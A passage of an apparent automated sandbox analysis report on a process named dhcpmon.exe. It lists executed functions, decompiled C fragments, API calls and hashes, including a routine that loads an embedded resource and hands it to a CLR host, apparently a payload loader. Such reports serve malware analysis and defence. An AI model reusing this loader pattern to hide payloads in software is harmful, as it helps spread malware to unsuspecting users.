				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                0x0040557b
                0x00405586
                0x0040558d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CommandLine
                • String ID: `3M
                • API String ID: 3253501508-1267747375
                • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 6212 Parent PID: 6752 dhcpmon.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EB6C0, Relevance: 6.1, APIs: 4, Instructions: 122threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 009EB730
                • GetCurrentThread.KERNEL32 ref: 009EB76D
                • GetCurrentProcess.KERNEL32 ref: 009EB7AA
                • GetCurrentThreadId.KERNEL32 ref: 009EB803
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 973efce7dd52f1da9740c83dcbe666a54dd7897319371b515d2b54ca30336996
                • Instruction ID: eac9c2251649c36b06caa161973941c5ac517ed28c73361cb3411077dea34c64
                • Opcode Fuzzy Hash: 973efce7dd52f1da9740c83dcbe666a54dd7897319371b515d2b54ca30336996
                • Instruction Fuzzy Hash: 735163B4E007888FDB11CFAAD5887DEBBF0AF88308F20846AE418A7790C7745945CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 009EB730
                • GetCurrentThread.KERNEL32 ref: 009EB76D
                • GetCurrentProcess.KERNEL32 ref: 009EB7AA
                • GetCurrentThreadId.KERNEL32 ref: 009EB803
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 05f122136028078a18ada102883b9fdcc6d3cf2462d660b3b7a5197d20a0462a
                • Instruction ID: df37f49c721fa0636f26b77532b98b0d4acbc0f8052b31602bd54416b9f3d565
                • Opcode Fuzzy Hash: 05f122136028078a18ada102883b9fdcc6d3cf2462d660b3b7a5197d20a0462a
                • Instruction Fuzzy Hash: 9E5142B0D007888FDB11CFAAD588BEEBBF4AF88308F208469E419B7750D7756945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f861b8abf5cf6ad1710a1d74da6c6db3ecd2f41c9d8fd80d08a51993204641ba
                • Instruction ID: 060b9564e7293dcca6086be91a131662d6cb388dbbdbccb6fb0e9392b27b3555
                • Opcode Fuzzy Hash: f861b8abf5cf6ad1710a1d74da6c6db3ecd2f41c9d8fd80d08a51993204641ba
                • Instruction Fuzzy Hash: 9C22A374E00205CFEB14CF9AD598AEEB7B1FB4A340F258995D441AB364D734B882CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009E93E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 009E962E
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 913aaada16f354ffbc9a017e5e647db521e02ce2d5890b433f805820282541fc
                • Instruction ID: 59318d256efe4454b4823660caaa55387cdd9e25458ade9049bbc8b928508172
                • Opcode Fuzzy Hash: 913aaada16f354ffbc9a017e5e647db521e02ce2d5890b433f805820282541fc
                • Instruction Fuzzy Hash: D0715670A00B458FD725CF6AC44179BB7F5BF88304F10892AE44ADBA50EB34E806CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EFBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009EFD0A
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 8196ea23c013385aa3475f26a689ae8249ece9bf1f30694eea32250d5cea493b
                • Instruction ID: 3239f36bfda1b02a3c1108949800f19bdec4ad5ae607e1cabba526447d21fa5f
                • Opcode Fuzzy Hash: 8196ea23c013385aa3475f26a689ae8249ece9bf1f30694eea32250d5cea493b
                • Instruction Fuzzy Hash: A951DFB1D002499FDF15CFAAC894ADEBBB5FF48314F24812AE819AB250D7749985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009EFD0A
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 23b627f9c3e315c9280ec224c8e0f53d77aa1f529cf9edf9e343badf5a3539e6
                • Instruction ID: fd048cdb8b4030b761e6a26fa74ac0f549fc9728ef166c0daca621bd708f76e9
                • Opcode Fuzzy Hash: 23b627f9c3e315c9280ec224c8e0f53d77aa1f529cf9edf9e343badf5a3539e6
                • Instruction Fuzzy Hash: 8C41BEB1D003489FDF15CFAAC894ADEBBB5BF48314F24812AE819AB250D7749985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB45F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 04FB46B1
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: da129cf13438b087ec3a48f08a344cf353506a7df359467a9bb675e992cc8586
                • Instruction ID: 7b13065587390fdd035864adbbe5cf43b0cb26c57f501a2817c54f9690ec0849
                • Opcode Fuzzy Hash: da129cf13438b087ec3a48f08a344cf353506a7df359467a9bb675e992cc8586
                • Instruction Fuzzy Hash: F241E2B1C0465CCBDB24CFA9C984BCEBBB1BF49308F208069D449AB251E7756946CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 04FB46B1
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 9d3faeba91b676be272a449a6477b53793a16052a8ed6512dddc0d5cf3292337
                • Instruction ID: 691991f0dd8be73ec1c47e99bf5c70dfe2607be8608f2b851d3b2a66a4f6b845
                • Opcode Fuzzy Hash: 9d3faeba91b676be272a449a6477b53793a16052a8ed6512dddc0d5cf3292337
                • Instruction Fuzzy Hash: A541F2B1C0465CCBDB24CFAAC944BDEBBB6BF49308F208069D409BB251D7756946CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB2531
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: a0f816c0d83278f0a6be2c49690c68f4e570f6aada47a27e45a0961fa34fad84
                • Instruction ID: f6af0b01dc0563577d8da570a4fb5c8808509a118a4c761f751ce76930367bf9
                • Opcode Fuzzy Hash: a0f816c0d83278f0a6be2c49690c68f4e570f6aada47a27e45a0961fa34fad84
                • Instruction Fuzzy Hash: A1413AB4A00245CFCB14CF99C488AAEBBF5FF89314F25C499D459AB325D334A942CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 052504C8, Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 97735ac4564d6e32a3c3bf485810ba4c02a30f412274aeb07a6396cf186d602d
                • Instruction ID: 033f4334d2d629080487da683a2256b5b6fed6f60c46a6a5c4bcde0e9d0ace53
                • Opcode Fuzzy Hash: 97735ac4564d6e32a3c3bf485810ba4c02a30f412274aeb07a6396cf186d602d
                • Instruction Fuzzy Hash: DF319C74A28249CFDB15CFA9D848BEDBBF1BF49324F058059E815AB361C7749845CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBB888, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04FBB957
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 03f54f303c626c711296be041fd8d3a47cdc4ea20f4767b00c357df734c1ced7
                • Instruction ID: 6d1828cb11b48d238be4fcb43c4dd1671f702d8b2efb647af7d4ce3ebf8e3d33
                • Opcode Fuzzy Hash: 03f54f303c626c711296be041fd8d3a47cdc4ea20f4767b00c357df734c1ced7
                • Instruction Fuzzy Hash: 51318F71904388AFDB018FA9D800ADEBFF8EF0A314F14845AE594E7251C335E955DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EBCF8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009EBD87
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 9d4cece2912818b341c99acbd274838bc9a60c502de19a8b6797818384f9dd2d
                • Instruction ID: 80a09cd2024f7df1c7078a5ab9e2188b7bd87a78390e1ff47c36d30f839f190d
                • Opcode Fuzzy Hash: 9d4cece2912818b341c99acbd274838bc9a60c502de19a8b6797818384f9dd2d
                • Instruction Fuzzy Hash: 0B2100B5D002499FDB01CFA9D884ADEBBF5EF48314F14801AE958B7250C378AA45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009EBD87
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 9cb9b1d09490146afccc46db357b6ca82021f045464bf881eb22f0af9c3e6e6f
                • Instruction ID: c42b70d436a2b22ab575613787809af68b0e05027883ff849215b18281e3e271
                • Opcode Fuzzy Hash: 9cb9b1d09490146afccc46db357b6ca82021f045464bf881eb22f0af9c3e6e6f
                • Instruction Fuzzy Hash: AB21C4B59002489FDB11CFAAD884ADEFBF8EB48314F14841AE918B7350D378A954CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009E7EEA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009E7F5D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 474cdc9f9d9b6650175f1b7cea89ef39653e914656342f2545ac3433e4b105a4
                • Instruction ID: 7d415ee93eb30dd99459f1a45e42af8f901fcb5669a379d91fb5e0164457d9cb
                • Opcode Fuzzy Hash: 474cdc9f9d9b6650175f1b7cea89ef39653e914656342f2545ac3433e4b105a4
                • Instruction Fuzzy Hash: 7D21AF759087958FCB12DFA9D8453DEFFF8EF05314F08845AD498A7282C3789A45CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009E8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009E96A9,00000800,00000000,00000000), ref: 009E98BA
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: e4e989c59862191c69e642157806826e334fdeb2339ba07884abc2441be85235
                • Instruction ID: 5f31cb28f05d502c3407cd216a4a5dae24c3659c199324033a953ba7f87b1a31
                • Opcode Fuzzy Hash: e4e989c59862191c69e642157806826e334fdeb2339ba07884abc2441be85235
                • Instruction Fuzzy Hash: DA11F2B69002898FCB11CF9AC444ADEFBF8EB49310F10842AE529B7610C375A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009E9849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009E96A9,00000800,00000000,00000000), ref: 009E98BA
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 85649fa39224e87f4331897b14cad9080f0bbb53d44ccd9bdfb7016801e7ab44
                • Instruction ID: f7a3683c85d712d5f95307ff9f6e1b69175213d3fa8d78f993e2292f8bf8c6bc
                • Opcode Fuzzy Hash: 85649fa39224e87f4331897b14cad9080f0bbb53d44ccd9bdfb7016801e7ab44
                • Instruction Fuzzy Hash: D81103B6D002498FDB10CF9AC844ADEFBF4AB89314F14852AD529A7710C374A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04FBB957
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 915ba9d16b66063c533e15e6539edf4f3cd77021e7d206623dadfb7a2342447b
                • Instruction ID: 1be5a3621c848f6989544148e96982415c356b10b16f77380efea739a0969d74
                • Opcode Fuzzy Hash: 915ba9d16b66063c533e15e6539edf4f3cd77021e7d206623dadfb7a2342447b
                • Instruction Fuzzy Hash: 9A1137B58002499FDB10CFAAC844BDEBFF8EF48310F14841AE564B7210C375A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,009753E8,00000000,?), ref: 04FBE73D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 9a23652e1b2c9ea7e2d4cc5511e362389e86995be855cefb9309445734e0686d
                • Instruction ID: 5cc38291c8b6170378182145831065381c537f0d5beb7fc658d1c0d4201396c2
                • Opcode Fuzzy Hash: 9a23652e1b2c9ea7e2d4cc5511e362389e86995be855cefb9309445734e0686d
                • Instruction Fuzzy Hash: 7D1128B59007499FDB10CF9AC885BEEFBF8EB59310F10841AE954A3240D378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05256832, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05256890
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 8fa52ec0f32074002a0c515e128da008ffa198249137041481eb749c0c8ec41b
                • Instruction ID: 1d1994ea8d9750300d24b81996e1702414ae2a6c6a2a53541309b7d17db52f51
                • Opcode Fuzzy Hash: 8fa52ec0f32074002a0c515e128da008ffa198249137041481eb749c0c8ec41b
                • Instruction Fuzzy Hash: 5011F8B5C006498FCB10CF99C489BDEBBF4EF48324F158419D959A7340D778A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBE6D8, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,009753E8,00000000,?), ref: 04FBE73D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 7e5b48df5df4a47ba29fd46885c3a29d044ed2e4a4dcc4d8c2d459ff99300c0e
                • Instruction ID: ad0c54c081d5968d11674a84814a8b3c6c14f31102a469eaf0c71beed1714d17
                • Opcode Fuzzy Hash: 7e5b48df5df4a47ba29fd46885c3a29d044ed2e4a4dcc4d8c2d459ff99300c0e
                • Instruction Fuzzy Hash: 2B1125B5900749CFDB10CF99C4847EEBBF4EB19314F24841AD968A3640D378AA56CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05256838, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05256890
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 735938bc1dad1575a305ddd3bf7add3efc9989e5ce397404cc08ebc25916caf1
                • Instruction ID: d9d5ce0bba002ef3809e05430d90906945bd4fe931478ec9acf93639cd6600e1
                • Opcode Fuzzy Hash: 735938bc1dad1575a305ddd3bf7add3efc9989e5ce397404cc08ebc25916caf1
                • Instruction Fuzzy Hash: F61106B58006498FCB10CF99C448BDEBBF4EF48324F10842AD969A7340D778A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009E95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 009E962E
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 1cc393120fcff6c5324d2822960226875fe9997aaa72c4c7a240c3b54ea9fb7e
                • Instruction ID: 9298bde7a5c44b6e125447e28e10510e6fea7347b64e630e12836fdba538e98b
                • Opcode Fuzzy Hash: 1cc393120fcff6c5324d2822960226875fe9997aaa72c4c7a240c3b54ea9fb7e
                • Instruction Fuzzy Hash: 0411D2B5D006898FCB10CF9AC444BDEFBF4AB88714F10851AD429A7600C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 04FBBCBD
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 7c894487b47da83c679639ea2d8b66861496710c8e8ca1f2d094ea0a89ea8b26
                • Instruction ID: ce375d23594c5613b381d1d62da994e80c5d1b0f4c5e4881e6182f58d7f7dec3
                • Opcode Fuzzy Hash: 7c894487b47da83c679639ea2d8b66861496710c8e8ca1f2d094ea0a89ea8b26
                • Instruction Fuzzy Hash: 9311F2B5900748DFDB11CF9AC888BDEBBF8EB49310F10841AE969A7700C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,04FB226A,?,00000000,?), ref: 04FBC435
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 57e72ca8923bf29218fe480b4f395a10c19ad403d26b91ffb86dee870148f8e7
                • Instruction ID: fb9d4408ec5cf8a261a126bb08638fe4051988833bcf63464d491f1931a81cb1
                • Opcode Fuzzy Hash: 57e72ca8923bf29218fe480b4f395a10c19ad403d26b91ffb86dee870148f8e7
                • Instruction Fuzzy Hash: 7F11E3B59007889FDB10CF9AC884BEFBBF8EB49314F108419E558A7600C374A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FB50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 04FBD29D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 288c026d15a82567156d6fb5a9a72c1778bb322445dc1beb48c4ca0d5ed1c0aa
                • Instruction ID: 9e6a78b91c0ea3ea5893851b7ebc3a4c9861c45105315b19ea9dedc96dee53cf
                • Opcode Fuzzy Hash: 288c026d15a82567156d6fb5a9a72c1778bb322445dc1beb48c4ca0d5ed1c0aa
                • Instruction Fuzzy Hash: EB11F5B59006489FDB10CF9AC484BDEBBF8EB49314F108419E958B7200C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05250438, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
